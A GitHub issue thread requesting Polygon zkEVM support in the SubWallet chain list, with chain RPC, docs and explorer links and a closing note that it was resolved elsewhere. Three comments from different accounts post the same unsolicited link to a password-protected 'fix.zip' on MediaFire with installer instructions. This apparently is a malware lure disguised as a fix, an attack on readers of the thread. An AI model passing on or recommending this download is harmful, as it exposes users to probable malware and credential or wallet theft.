### ISSUE TITLE
[Polygon zkEVM] Add support for Polygon zkEVM

### ISSUE THREAD

**Issue by Mabel-Nguyen** [Koniverse/SubWallet-ChainList#292]
Polygon zkEVM is to Ethereum a Layer 2 network.

**If you want to integrate a chain, you would need to provide**
- Name of the blockchain: Polygon zkEVM
- Type of the blockchain: zkEVM
- Blockchain providers: [https://zkevm-rpc.com/](https://zkevm-rpc.com/)
- Metadata of the blockchain: https://docs.polygon.technology/zkEVM/overview/
- Logo of the blockchain: https://www.figma.com/design/z9s6aLTLoUdjMwoXLyWcPz/01.SubWallet-Project-Logo?node-id=7212-103&t=OTWpjtOx5jQCiRSI-4
- Block explorers: https://zkevm.polygonscan.com/

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sokol142196** [comment]
Resolved in https://github.com/Koniverse/SubWallet-Extension/issues/3518
